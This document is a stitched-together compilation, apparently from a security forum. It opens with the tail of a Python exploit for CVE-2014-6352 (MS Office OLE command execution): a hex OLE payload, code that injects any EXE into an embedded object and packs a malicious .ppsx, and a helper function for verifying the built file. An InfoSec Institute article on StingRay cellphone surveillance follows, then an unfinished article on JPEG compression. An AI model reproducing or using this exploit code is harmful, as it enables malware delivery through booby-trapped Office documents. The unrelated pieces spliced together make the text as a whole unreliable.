"\x86\x02\x00\x00\x87\x02\x00\x00\x88\x02\x00\x00\x89\x02\x00\x00\x8A\x02\x00\x00\x8B\x02\x00\x00\x8C\x02\x00\x00\x8D\x02\x00\x00\x8E\x02" "\x00\x00\x8F\x02\x00\x00\x90\x02\x00\x00\x91\x02\x00\x00\x92\x02\x00\x00\x93\x02\x00\x00\x94\x02\x00\x00\x95\x02\x00\x00\x96\x02\x00\x00" "\x97\x02\x00\x00\x98\x02\x00\x00\x99\x02\x00\x00\x9A\x02\x00\x00\x9B\x02\x00\x00\x9C\x02\x00\x00\x9D\x02\x00\x00\x9E\x02\x00\x00\x9F\x02" "\x00\x00\xA0\x02\x00\x00\xA1\x02\x00\x00\xA2\x02\x00\x00\xA3\x02\x00\x00\xA4\x02\x00\x00\xA5\x02\x00\x00\xA6\x02\x00\x00\xA7\x02\x00\x00" "\xA8\x02\x00\x00\xA9\x02\x00\x00\xAA\x02\x00\x00\xAB\x02\x00\x00\xAC\x02\x00\x00\xAD\x02\x00\x00\xAE\x02\x00\x00\xAF\x02\x00\x00\xB0\x02" "\x00\x00\xB1\x02\x00\x00\xB2\x02\x00\x00\xB3\x02\x00\x00\xB4\x02\x00\x00\xB5\x02\x00\x00\xB6\x02\x00\x00\xB7\x02\x00\x00\xB8\x02\x00\x00" "\xB9\x02\x00\x00\xBA\x02\x00\x00\xBB\x02\x00\x00\xBC\x02\x00\x00\xBD\x02\x00\x00\xBE\x02\x00\x00\xBF\x02\x00\x00\xC0\x02\x00\x00\xC1\x02" "\x00\x00\xC2\x02\x00\x00\xC3\x02\x00\x00\xC4\x02\x00\x00\xC5\x02\x00\x00\xC6\x02\x00\x00\xC7\x02\x00\x00\xC8\x02\x00\x00\xC9\x02\x00\x00" "\xCA\x02\x00\x00\xCB\x02\x00\x00\xCC\x02\x00\x00\xCD\x02\x00\x00\xCE\x02\x00\x00\xCF\x02\x00\x00\xD0\x02\x00\x00\xD1\x02\x00\x00\xD2\x02" "\x00\x00\xD3\x02\x00\x00\xD4\x02\x00\x00\xD5\x02\x00\x00\xD6\x02\x00\x00\xD7\x02\x00\x00\xD8\x02\x00\x00\xD9\x02\x00\x00\xDA\x02\x00\x00" "\xDB\x02\x00\x00\xDC\x02\x00\x00\xDD\x02\x00\x00\xDE\x02\x00\x00\xDF\x02\x00\x00\xE0\x02\x00\x00\xE1\x02\x00\x00\xE2\x02\x00\x00\xE3\x02" "\x00\x00\xE4\x02\x00\x00\xE5\x02\x00\x00\xE6\x02\x00\x00\xE7\x02\x00\x00\xE8\x02\x00\x00\xE9\x02\x00\x00\xEA\x02\x00\x00\xEB\x02\x00\x00" "\xEC\x02\x00\x00\xED\x02\x00\x00\xEE\x02\x00\x00\xEF\x02\x00\x00\xF0\x02\x00\x00\xF1\x02\x00\x00\xF2\x02\x00\x00\xF3\x02\x00\x00\xF4\x02" "\x00\x00\xF5\x02\x00\x00\xF6\x02\x00\x00\xF7\x02\x00\x00\xF8\x02\x00\x00\xF9\x02\x00\x00\xFA\x02\x00\x00\xFB\x02\x00\x00\xFC\x02\x00\x00" 
"\xFD\x02\x00\x00\xFE\x02\x00\x00\xFF\x02\x00\x00\x00\x03\x00\x00\x01\x03\x00\x00\x02\x03\x00\x00\x03\x03\x00\x00\x04\x03\x00\x00\x05\x03" "\x00\x00\x06\x03\x00\x00\x07\x03\x00\x00\x08\x03\x00\x00\x09\x03\x00\x00\x0A\x03\x00\x00\x0B\x03\x00\x00\x0C\x03\x00\x00\x0D\x03\x00\x00" "\x0E\x03\x00\x00\x0F\x03\x00\x00\x10\x03\x00\x00\x11\x03\x00\x00\x12\x03\x00\x00\x13\x03\x00\x00\x14\x03\x00\x00\x15\x03\x00\x00\x16\x03" "\x00\x00\x17\x03\x00\x00\x18\x03\x00\x00\x19\x03\x00\x00\x1A\x03\x00\x00\x1B\x03\x00\x00\x1C\x03\x00\x00\x1D\x03\x00\x00\x1E\x03\x00\x00" "\x1F\x03\x00\x00\x20\x03\x00\x00\x21\x03\x00\x00\x22\x03\x00\x00\x23\x03\x00\x00\x24\x03\x00\x00\x25\x03\x00\x00\x26\x03\x00\x00\x27\x03" "\x00\x00\x28\x03\x00\x00\x29\x03\x00\x00\x2A\x03\x00\x00\x2B\x03\x00\x00\x2C\x03\x00\x00\x2D\x03\x00\x00\x2E\x03\x00\x00\x2F\x03\x00\x00" "\x30\x03\x00\x00\x31\x03\x00\x00\x32\x03\x00\x00\x33\x03\x00\x00\x34\x03\x00\x00\x35\x03\x00\x00\x36\x03\x00\x00\x37\x03\x00\x00\x38\x03" "\x00\x00\x39\x03\x00\x00\x3A\x03\x00\x00\x3B\x03\x00\x00\x3C\x03\x00\x00\x3D\x03\x00\x00\x3E\x03\x00\x00\x3F\x03\x00\x00\x40\x03\x00\x00" "\x41\x03\x00\x00\x42\x03\x00\x00\x43\x03\x00\x00\x44\x03\x00\x00\x45\x03\x00\x00\x46\x03\x00\x00\x47\x03\x00\x00\x48\x03\x00\x00\x49\x03" "\x00\x00\x4A\x03\x00\x00\x4B\x03\x00\x00\x4C\x03\x00\x00\x4D\x03\x00\x00\x4E\x03\x00\x00\x4F\x03\x00\x00\x50\x03\x00\x00\x51\x03\x00\x00" "\x52\x03\x00\x00\x53\x03\x00\x00\x54\x03\x00\x00\x55\x03\x00\x00\x56\x03\x00\x00\x57\x03\x00\x00\x58\x03\x00\x00\x59\x03\x00\x00\x5A\x03" "\x00\x00\x5B\x03\x00\x00\x5C\x03\x00\x00\x5D\x03\x00\x00\x5E\x03\x00\x00\x5F\x03\x00\x00\x60\x03\x00\x00\x61\x03\x00\x00\x62\x03\x00\x00" "\x63\x03\x00\x00\x64\x03\x00\x00\x65\x03\x00\x00\x66\x03\x00\x00\x67\x03\x00\x00\x68\x03\x00\x00\x69\x03\x00\x00\x6A\x03\x00\x00\x6B\x03" "\x00\x00\x6C\x03\x00\x00\x6D\x03\x00\x00\x6E\x03\x00\x00\x6F\x03\x00\x00\x70\x03\x00\x00\x71\x03\x00\x00\x72\x03\x00\x00\x73\x03\x00\x00" 
"\x74\x03\x00\x00\x75\x03\x00\x00\x76\x03\x00\x00\x77\x03\x00\x00\x78\x03\x00\x00\x79\x03\x00\x00\x7A\x03\x00\x00\x7B\x03\x00\x00\x7C\x03" "\x00\x00\x7D\x03\x00\x00\x7E\x03\x00\x00\x7F\x03\x00\x00\x80\x03\x00\x00\x81\x03\x00\x00\x82\x03\x00\x00\x83\x03\x00\x00\x84\x03\x00\x00" "\x85\x03\x00\x00\x86\x03\x00\x00\x87\x03\x00\x00\x88\x03\x00\x00\x89\x03\x00\x00\x8A\x03\x00\x00\x8B\x03\x00\x00\x8C\x03\x00\x00\x8D\x03" "\x00\x00\x8E\x03\x00\x00\x8F\x03\x00\x00\x90\x03\x00\x00\x91\x03\x00\x00\x92\x03\x00\x00\x93\x03\x00\x00\x94\x03\x00\x00\x95\x03\x00\x00" "\x96\x03\x00\x00\x97\x03\x00\x00\x98\x03\x00\x00\x99\x03\x00\x00\x9A\x03\x00\x00\x9B\x03\x00\x00\x9C\x03\x00\x00\x9D\x03\x00\x00\x9E\x03" "\x00\x00\x9F\x03\x00\x00\xA0\x03\x00\x00\xA1\x03\x00\x00\xA2\x03\x00\x00\xA3\x03\x00\x00\xA4\x03\x00\x00\xA5\x03\x00\x00\xA6\x03\x00\x00" "\xA7\x03\x00\x00\xA8\x03\x00\x00\xA9\x03\x00\x00\xAA\x03\x00\x00\xAB\x03\x00\x00\xAC\x03\x00\x00\xAD\x03\x00\x00\xAE\x03\x00\x00\xAF\x03" "\x00\x00\xB0\x03\x00\x00\xB1\x03\x00\x00\xB2\x03\x00\x00\xB3\x03\x00\x00\xB4\x03\x00\x00\xB5\x03\x00\x00\xB6\x03\x00\x00\xB7\x03\x00\x00" "\xB8\x03\x00\x00\xB9\x03\x00\x00\xBA\x03\x00\x00\xBB\x03\x00\x00\xBC\x03\x00\x00\xBD\x03\x00\x00\xBE\x03\x00\x00\xBF\x03\x00\x00\xC0\x03" "\x00\x00\xC1\x03\x00\x00\xC2\x03\x00\x00\xC3\x03\x00\x00\xC4\x03\x00\x00\xC5\x03\x00\x00\xC6\x03\x00\x00\xC7\x03\x00\x00\xC8\x03\x00\x00" "\xC9\x03\x00\x00\xCA\x03\x00\x00\xCB\x03\x00\x00\xCC\x03\x00\x00\xCD\x03\x00\x00\xCE\x03\x00\x00\xCF\x03\x00\x00\xD0\x03\x00\x00\xD1\x03" "\x00\x00\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x19\x91\x07\x00\x02\x00\x70\x75\x74\x74\x79\x2E\x65\x78"
"\x65\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x44\x65\x73\x6B\x74\x6F\x70\x5C\x50\x4F\x43\x5C\x70\x75\x74\x74\x79\x2E\x65"
"\x78\x65\x00\x00\x00\x03\x00\x2A\x00\x00\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x41\x70\x70\x44\x61\x74\x61\x5C\x4C\x6F"
"\x63\x61\x6C\x5C\x54\x65\x6D\x70\x5C\x70\x75\x74\x74\x79\x2E\x65\x78\x65\x00\x00\x90\x07\x00"
)

if len(sys.argv) != 2:
    print ("[+] Usage: "+ sys.argv[0] + " [exe file] (EXE file should be less than 400KB)")
    exit(0)

file = sys.argv[1]
f = open(file, mode='rb')
buff = f.read()
f.close()

evilbuff = bytearray((oleole + buff))
evilbuff += "\x00" * 20000

file = "temp\ppt\embeddings\oleObject1.bin"
f = open(file, mode='wb')
f.write(evilbuff)
print ("[+] Injected exe into OLE")

shutil.make_archive("exploit", "zip", "temp")
print ("[+] packing exploit ppsx")
shutil.move('exploit.zip', 'CVE-2014-6352.ppsx')
print ("[+] Done")

Source: MS Office 2007 and 2010 - OLE Arbitrary Command Execution
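As a sanity check (my own sketch, not part of the published exploit): an OOXML .ppsx is a ZIP container, so the generated package can be verified to be a well-formed ZIP whose embedded OLE stream starts with the compound-file magic bytes that the `oleole` payload opens with:

```python
# Sanity-check sketch: an OOXML .ppsx is a ZIP container; confirm the
# embedded OLE stream exists and starts with the compound-file magic
# bytes (D0 CF 11 E0 A1 B1 1A E1) that the payload above begins with.
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def embedded_ole_looks_valid(path, member="ppt/embeddings/oleObject1.bin"):
    """True if the package contains the member and it carries OLE magic."""
    with zipfile.ZipFile(path) as z:
        if member not in z.namelist():
            return False
        return z.read(member)[:8] == OLE_MAGIC
```

This kind of check catches the common failure mode where the `temp` folder layout is wrong and `shutil.make_archive` packs the OLE object under the wrong path.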
-
StingRay Technology: How Government Tracks Cellular Devices

StingRay Technology

StingRay is an IMSI-catcher (International Mobile Subscriber Identity) designed and commercialized by the Harris Corporation. The cellular-surveillance system costs as much as $400,000 in the basic configuration, and its price varies with the add-ons ordered by the agency.

The IMSI-catcher is a surveillance solution used by military and intelligence agencies for telephone eavesdropping. It allows for intercepting mobile phone traffic and tracking the movements of mobile phone users. Essentially, an IMSI catcher operates as a bogus mobile cell tower that sits between the target mobile phone and the service provider's real towers. The IMSI catcher runs a Man In The Middle (MITM) attack that cannot be detected by users without specific products that secure communication on mobile devices.

The use of the IMSI-catcher is raising a heated debate in the United States because devices like StingRay and other similar cellphone-tracking solutions are being widely adopted by law enforcement agencies across the country. Due to the popularity of StingRay, the name is used improperly to reference several types of cellphone-surveillance solutions.

StingRay allows law enforcement to intercept calls and Internet traffic, send fake texts, inject malware onto a mobile device, and locate targets. Privacy advocates are concerned with possible abuses of such invasive technology. They speculate that there is a concrete risk that cyber criminals and foreign state-sponsored hackers could use it to track US citizens.

StingRay-like solutions, also known as cell site simulators, trick cellphones into revealing different data, including users' locations and identifying information. Law enforcement and intelligence agencies can target a specific individual by analyzing incoming and outgoing calls and drawing on his social network.
The principal problem with the adoption of StingRay cellphone-surveillance technology is that, unlike other solutions, it targets all nearby cellular devices, allowing an attacker to get information from hundreds of devices concurrently.

Figure 1 – StingRay

As explained by Nathan Freed Wessler, an attorney with the ACLU's Speech, Privacy & Technology Project, StingRay equipment sends intrusive electronic signals into the immediate vicinity, reaching into private buildings and siphoning data about the locations and identities of the cellphones inside. The Federal Communications Commission (FCC) recently created an internal task force to study the misuse of IMSI catchers by the cybercrime ecosystem and foreign intelligence agencies, which demonstrated that this technology could be used to spy on American citizens, businesses and diplomats.

How does StingRay work?

StingRay equipment can operate in both active and passive modes. In the first case, the device simulates the behavior of a wireless carrier cell tower. In the second case, it actively interferes with cellular devices, performing operations like data exfiltration. The StingRay system is typically installed in a vehicle so that agents can move it into any neighborhood. It tricks all nearby cellular devices into connecting to it and allowing data access by law enforcement.

Let us look in detail at the two operating modes implemented by the StingRay technology.

The Passive mode

A StingRay operating in passive mode is able to receive and analyze signals being transmitted by mobile devices and wireless carrier cell stations. The term "passive" indicates that the equipment doesn't communicate directly with cellular devices and does not simulate a wireless carrier cell site. The activity of base station surveys allows extracting information on cell sites, including identification numbers, signal strength, and signal coverage areas.
In this mode, StingRay operates as a mobile phone and collects signals sent by cell stations near the equipment.

The Active mode

StingRay equipment operating in "active mode" will force each cellular device in a predetermined area to disconnect from its legitimate service provider cell site and establish a new connection with the attacker's StingRay system. StingRay broadcasts a pilot signal that is stronger than the signals sent by legitimate cell sites operating in the same area, forcing connections from the cellular devices in the area covered by the equipment.

The principal operations performed by the StingRay are:

- Data extraction from cellular devices – StingRay collects information that identifies a cellular device (i.e. IMSI, ESN) directly from it by using radio waves.
- Running Man In The Middle attacks to eavesdrop on communications content
- Writing metadata to the cellular device
- Denial of Service, preventing the cellular device user from placing a call or accessing data services
- Forcing an increase in signal transmission power
- Forcing an abundance of signal transmissions
- Tracking and locating

Figure 2 – StingRay case study

USA – StingRay is a prerogative of intelligence agencies

Surveillance of cell phones is a common practice of intelligence agencies. Agents have used devices like StingRay for a long time, and their use has extended to local law enforcement in the USA. Dozens of local law enforcement and police agencies are collecting information about thousands of cell phone devices at a time by using advanced technology, according to public records obtained by various media agencies in the country.

USA Today reported that records from more than 125 police agencies in 33 states reveal that nearly 25 percent of law-enforcement agencies have used "tower dumps," and at least 25 police departments have purchased StingRay equipment.
Many police agencies have denied public records requests, arguing that criminals or terrorists could benefit from the disclosure of information and evade the surveillance methods adopted locally by law enforcement. Security experts and privacy advocates have raised questions about the use of StingRay technology and the way law enforcement agencies manage and share citizens' data.

The militarization of America's local police agencies is a phenomenon attracting the attention of the media as never before, probably also as a consequence of the debate on privacy and surveillance triggered by Snowden's revelations. The phenomenon is not limited to the US.

Recent documents released by the City of Oakland reveal that the local Police Department, the nearby Fremont Police Department, and the Alameda County District Attorney jointly requested an upgrade for their cellular surveillance equipment. The specific upgrade to StingRay is known as Hailstorm, and it is necessary to allow the equipment to track cellular devices of the newest generation. According to the Ars web portal, the upgrade will cost $460,000, including $205,000 in total Homeland Security grant money and $50,000 from the Oakland Police Department.

Cellular tracking technology like StingRay is still considered a privileged solution for tracking cellular devices and siphoning their data. The interest of local law enforcement in surveillance solutions is increasing, and the decision to upgrade their equipment leads privacy experts to believe that its diffusion will continue to grow.

A look at the technologies that track cellular devices

To better understand the StingRay technology, let us familiarize ourselves with the names of the principal surveillance solutions available on the market.

Triggerfish

Triggerfish is eavesdropping equipment that allows law enforcement to intercept cellular conversations in real time.
Its use extends the basic capabilities of StingRay, which are more oriented to device location monitoring and gathering metadata. Triggerfish allows authorities to monitor up to 60,000 different phones at one time over the targeted area.

Figure 3 – Triggerfish

According to a post published by the journalist Ryan Gallagher on Ars, its cost ranges between $90,000 and $102,000.

Kingfish

Kingfish is a surveillance transceiver that is used by law enforcement and intelligence agencies to track cellular devices and exfiltrate information from mobile devices over a targeted area. It can be concealed in a briefcase, gathers unique identity codes, and shows connections between phones and numbers being dialed. Its cost is slightly higher than $25,000.

Figure 4 – Kingfish

Amberjack

Amberjack is an important accessory for surveillance systems like StingRay, Gossamer, and Kingfish. It is a direction-finding antenna system used for cellular device tracking. It costs about $35,015.

Harpoon

Harpoon is an "amplifier" (PDF) that can work in conjunction with both StingRay and Kingfish devices to track targets from a greater distance. Its cost ranges between $16,000 and $19,000.

Figure 5 – Harpoon

Hailstorm

Hailstorm is a surveillance device that can be purchased as a standalone unit or as an upgrade to StingRay or Kingfish. The system allows the tracking of cellular devices even if they are based on modern technology. "Procurement documents (PDF) show that Harris Corp. has, in at least one case, recommended that authorities use the Hailstorm in conjunction with software made by Nebraska-based surveillance company Pen-Link. The Pen-Link software appears to enable authorities deploying the Hailstorm to directly communicate with cell phone carriers over an Internet connection, possibly to help coordinate the surveillance of targeted individuals," states an Ars blog post.
The cost of Hailstorm is $169,602 if it is sold as a standalone unit; it can be cheaper if acquired as an upgrade.

Gossamer

Gossamer is a portable unit that is used to access data on cellular devices operating in a target area. Gossamer provides functionality similar to StingRay's, with the advantage of being a hand-held model. Gossamer also lets law enforcement run a DoS attack on a target, blocking it from making or receiving calls, as explained in the marketing materials (PDF) published by a Brazilian reseller of the Harris equipment. Gossamer is sold for $19,696.

Figure 6 – The Gossamer

The Case: Metropolitan Police Department (MPD) uses StingRay

StingRay has been used for a long time by the police. In 2003, the Metropolitan Police Department (MPD) in Washington, DC was awarded a $260,000 grant from the Department of Homeland Security (DHS) to acquire StingRay. The purchase was officially motivated by the need to increase capabilities in the investigation of possible terrorist events. Unfortunately, the device was not used by law enforcement for five years due to the lack of funds to pay for training in its use. In 2008, the Metropolitan Police Department decided to again adopt StingRay for its investigations, and received funds to upgrade it. VICE News has documented numerous purchases made by the DC police department related to the solutions and services offered by the Harris Corporation. The problem is that, according to government officials, the system wasn't used to prevent acts of terrorism; instead, law enforcement is using it in routine investigations involving ordinary crime. There is no documentation regarding the use of StingRay made by the agents of the department. In a memo dated December 2008, sent to the DC chief of police and other top department officials by the commander of the Narcotics and Special Investigations Division, the department explained how it intended to use StingRay.
"The [redacted] will be used by MPD to track cellular phones possessed by criminal offenders and/or suspected terrorists by using wireless technology to triangulate the location of the phone," states the document. "The ability to [redacted] in the possession of criminals will allow MPD to track their exact movements, as well as pinpoint their current locations for rapid apprehension. The procurement of this equipment will increase the number of MPD arrests for fugitives, drug traffickers, and violent offenders (robbery, assault with a deadly weapon, homicide), while reducing the time it takes to locate dangerous offenders that need to be removed from the streets of DC." The memo confirms that the department has used the StingRay for many purposes other than counterterrorism activities. Many organizations are condemning the use of such technology because it represents a serious threat to the privacy of citizens. When an agency uses StingRay to track a specific individual, it is very likely that the system will also catch many other devices belonging to innocent and unaware people. "When it's used to track a suspect's cell phone, [it] also gathers information about the phones of countless bystanders who happen to be nearby," explain representatives of the American Civil Liberties Union (ACLU). StingRay is also a privileged instrument to collect information about ongoing communications, including the phone numbers of interlocutors. It is important to understand that its use opens the door to a "sort of invasive surveillance". The principal problem with the use of Stingrays and similar solutions lies in their application context.
This category of equipment, in fact, was mainly designed to support intelligence activities, but today its use has been extended to local law enforcement, as explained by Nathan Wessler: "Initially the domain of the National Security Agency (NSA) and other intelligence agencies," the use of the tracking device has now "trickled down to federal, state, and local law enforcement." The extensive use of StingRay is a violation of the Fourth Amendment; it threatens the rights of tens of thousands of DC residents. The ACLU has identified 44 law enforcement agencies in 18 states in the US that use StingRay equipment for their investigations, but as explained by Wessler, the use of such devices in the vicinity of government offices is a circumstance of great concern. That's why he mentioned the case of the capital, Washington. "An inherent attribute of how this technology functions is that it sweeps in information about large numbers of innocent bystanders even when police are trying to track the location of a particular suspect. If the MPD is driving around DC with Stingray devices, it is likely capturing information about the locations and movements of members of Congress, cabinet members, federal law enforcement agents, Homeland Security personnel, consular staff, foreign dignitaries, and all of the other people who congregate in the District…. If cell phone calls of congressional staff, White House aides, or even members of Congress are being disconnected, dropped, or blocked by MPD Stingrays, that's a particularly sensitive and troublesome problem," said Wessler during an interview with VICE News. The documents obtained by the website Muckrock from the FBI revealed that law enforcement agencies are required to sign a non-disclosure agreement with the Bureau before they can start using StingRays for their investigations.
The ACLU obtained emails explaining that the vendor Harris Corporation misled the FCC into approving Stingray by claiming it would be adopted for "emergency situations." In reality, the equipment is used by law enforcement for any kind of investigation. The following map reports the use of the StingRay tracking system by state and local police departments. According to the ACLU, 46 agencies in 18 states and the District of Columbia own StingRays. According to privacy experts, the data underestimate the real diffusion of the StingRay system because of the lack of official documentation reporting the number of investigations in which the equipment has been used.

Figure 7 – StingRay diffusion in the USA

Conclusion

StingRay technology raises serious privacy concerns because of the indiscriminate way it targets cellular devices in a specific area. The dragnet way in which StingRay operates appears to conflict with the principles of various laws worldwide. Government and law enforcement shouldn't be able to access citizens' private information without a court order issued to support investigation activities. In the US, for example, the Fourth Amendment stands for the basic principle that the US government cannot conduct massive surveillance operations, also referred to as "general searches". The Supreme Court recently reiterated that principle in a case involving cell phone surveillance, and confirmed that law enforcement needs a warrant to analyze data on a suspect's cellphone. Organizations for the defense of civil liberties ask governments to obtain warrants before using surveillance technologies like StingRay. The warrant still represents a reasonable mechanism for ensuring the right balance between citizens' privacy and law enforcement needs.
Organizations such as the American Civil Liberties Union and the Electronic Privacy Information Center (EPIC) have highlighted the risks related to the indiscriminate collection of such a large amount of cellular data. "I don't think that these devices should never be used, but at the same time, you should clearly be getting a warrant," said Alan Butler of EPIC. Unfortunately, cases such as the one disclosed in this post suggest that governments are using StingRay equipment in secrecy. In some cases, a court order is issued for specific activities, but law enforcement arbitrarily extends the use of the technology to other contexts that may menace citizens' privacy.

References

https://news.vice.com/article/police-in-washington-dc-are-using-the-secretive-stingray-cell-phone-tracking-tool
Surveillance - How to secretly track cellphone users position | Security Affairs
https://www.aclu.org/blog/national-security-technology-and-liberty/trickle-down-surveillance
https://www.aclu.org/maps/stingray-tracking-devices-whos-got-them
Cellphone spying gear, law enforcement has it, and it wants you to forget about it
https://www.scribd.com/doc/238334715/Stingray-Phone-Tracker
LYE: Short-circuiting 'stingray' surveillance of cellphones - Washington Times
Cellphone data spying: It's not just the NSA
https://www.aclu.org/files/assets/rigmaiden_-_doj_stingray_emails_declaration.pdf
Meet the machines that steal your phone's data | Ars Technica
http://cdn.arstechnica.net/wp-content/uploads/2013/09/amberjack.pdf
Request 2595
http://cdn.arstechnica.net/wp-content/uploads/2013/09/oakland-penlink-hailstorm.pdf

By Pierluigi Paganini | November 10th, 2014 | General Security

Sursa: StingRay Technology: How Government Tracks Cellular Devices - InfoSec Institute
-
Image Compression: Seeing What's Not There

In this article, we'll study the JPEG baseline compression algorithm...

David Austin
Grand Valley State University
david at merganser.math.gvsu.edu

The HTML file that contains all the text for this article is about 25,000 bytes. That's less than one of the image files that was also downloaded when you selected this page. Since image files typically are larger than text files and since web pages often contain many images that are transmitted across connections that can be slow, it's helpful to have a way to represent images in a compact format. In this article, we'll see how a JPEG file represents an image using a fraction of the computer storage that might be expected. We'll also look at some of the mathematics behind the newer JPEG 2000 standard. This topic, more widely known as data compression, asks the question, "How can we represent information in a compact, efficient way?" Besides image files, it is routine to compress data, video, and music files. For instance, compression enables your 8 gigabyte iPod Nano to hold about 2000 songs. As we'll see, the key is to organize the information in some way that reveals an inherent redundancy that can be eliminated. In this article, we'll study the JPEG baseline compression algorithm using the image on the right as an example. (JPEG is an acronym for "Joint Photographic Experts Group.") Some compression algorithms are lossless, for they preserve all the original information. Others, such as the JPEG baseline algorithm, are lossy--some of the information is lost, but only information that is judged to be insignificant. Before we begin, let's naively determine how much computer storage should be required for this image. First, the image is arranged in a rectangular grid of pixels whose dimensions are 250 by 375, giving a total of 93,750 pixels.
The color of each pixel is determined by specifying how much of the colors red, green and blue should be mixed together. Each color component is represented as an integer between 0 and 255 and so requires one byte of computer storage. Therefore, each pixel requires three bytes of storage, implying that the entire image should require 93,750 × 3 = 281,250 bytes. However, the JPEG image shown here is only 32,414 bytes. In other words, the image has been compressed by a factor of roughly nine. We will describe how the image can be represented in such a small file (compressed) and how it may be reconstructed (decompressed) from this file.

The JPEG compression algorithm

First, the image is divided into 8 by 8 blocks of pixels. Since each block is processed without reference to the others, we'll concentrate on a single block. In particular, we'll focus on the block highlighted below. Here is the same block blown up so that the individual pixels are more apparent. Notice that there is not tremendous variation over the 8 by 8 block (though other blocks may have more). Remember that the goal of data compression is to represent the data in a way that reveals some redundancy. We may think of the color of each pixel as represented by a three-dimensional vector (R, G, B) consisting of its red, green, and blue components. In a typical image, there is a significant amount of correlation between these components. For this reason, we will use a color space transform to produce a new vector whose components represent luminance, Y, and blue and red chrominance, Cb and Cr. The luminance describes the brightness of the pixel while the chrominance carries information about its hue. These three quantities are typically less correlated than the (R, G, B) components. Furthermore, psychovisual experiments demonstrate that the human eye is more sensitive to luminance than chrominance, which means that we may neglect larger changes in the chrominance without affecting our perception of the image.
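The article does not spell out the transform's coefficients; a minimal sketch, assuming the standard JFIF-style YCbCr conversion commonly used by JPEG encoders:

```python
def rgb_to_ycbcr(r, g, b):
    """JFIF-style RGB -> YCbCr; 128 is added to the chrominance
    components so that all values lie between 0 and 255."""
    y  =  0.299    * r + 0.587    * g + 0.114    * b
    cb = -0.168736 * r - 0.331264 * g + 0.5      * b + 128
    cr =  0.5      * r - 0.418688 * g - 0.081312 * b + 128
    return y, cb, cr

def ycbcr_to_rgb(y, cb, cr):
    """Inverse transform, needed when reconstructing the image."""
    r = y + 1.402    * (cr - 128)
    g = y - 0.344136 * (cb - 128) - 0.714136 * (cr - 128)
    b = y + 1.772    * (cb - 128)
    return r, g, b

# Round trip: a pure-red pixel survives the transform and its inverse.
print(ycbcr_to_rgb(*rgb_to_ycbcr(255, 0, 0)))
```

Note that a gray pixel (R = G = B) has zero chrominance (Cb = Cr = 128 after the shift), matching the claim that the chrominance carries only hue information.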
Since this transformation is invertible, we will be able to recover the (R, G, B) vector from the (Y, Cb, Cr) vector. This is important when we wish to reconstruct the image. (To be precise, we usually add 128 to the chrominance components so that they are represented as numbers between 0 and 255.) When we apply this transformation to each pixel in our block we obtain three new blocks, one corresponding to each component. These are shown below where brighter pixels correspond to larger values.

[Images of the three component blocks: Y, Cb, Cr]

As is typical, the luminance shows more variation than the chrominance. For this reason, greater compression ratios are sometimes achieved by assuming the chrominance values are constant on 2 by 2 blocks, thereby recording fewer of these values. For instance, the image editing software Gimp provides the following menu when saving an image as a JPEG file: The "Subsampling" option allows the choice of various ways of subsampling the chrominance values. Also of note here is the "Quality" parameter, whose importance will become clear soon.

The Discrete Cosine Transform

Now we come to the heart of the compression algorithm. Our expectation is that, over an 8 by 8 block, the changes in the components of the (Y, Cb, Cr) vector are rather mild, as demonstrated by the example above. Instead of recording the individual values of the components, we could record, say, the average values and how much each pixel differs from this average value. In many cases, we would expect the differences from the average to be rather small and hence safely ignored. This is the essence of the Discrete Cosine Transform (DCT), which will now be explained. We will first focus on one of the three components in one row in our block and imagine that the eight values are represented by f0, f1, ..., f7.
We would like to represent these values in a way so that the variations become more apparent. For this reason, we will think of the values as given by a function fx, where x runs from 0 to 7, and write this function as a linear combination of cosine functions:

fx = (1/2) Σw=0..7 Cw Fw cos((2x + 1)wπ/16)

Don't worry about the factor of 1/2 in front or the constants Cw (Cw = 1 for all w except C0 = 1/√2). What is important in this expression is that the function fx is being represented as a linear combination of cosine functions of varying frequencies with coefficients Fw. Shown below are the graphs of four of the cosine functions with corresponding frequencies w.

[Graphs of cos((2x + 1)wπ/16) for w = 0, 1, 2, 3]

Of course, the cosine functions with higher frequencies demonstrate more rapid variations. Therefore, if the values fx change relatively slowly, the coefficients Fw for larger frequencies should be relatively small. We could therefore choose not to record those coefficients in an effort to reduce the file size of our image. The DCT coefficients may be found using

Fw = (Cw/2) Σx=0..7 fx cos((2x + 1)wπ/16)

Notice that this implies that the DCT is invertible. For instance, we will begin with fx and record the values Fw. When we wish to reconstruct the image, however, we will have the coefficients Fw and recompute the fx. Rather than applying the DCT to only the rows of our blocks, we will exploit the two-dimensional nature of our image. The Discrete Cosine Transform is first applied to the rows of our block. If the image does not change too rapidly in the vertical direction, then the coefficients shouldn't either. For this reason, we may fix a value of w and apply the Discrete Cosine Transform to the collection of eight values of Fw we get from the eight rows. This results in coefficients Fw,u where w is the horizontal frequency and u represents a vertical frequency.
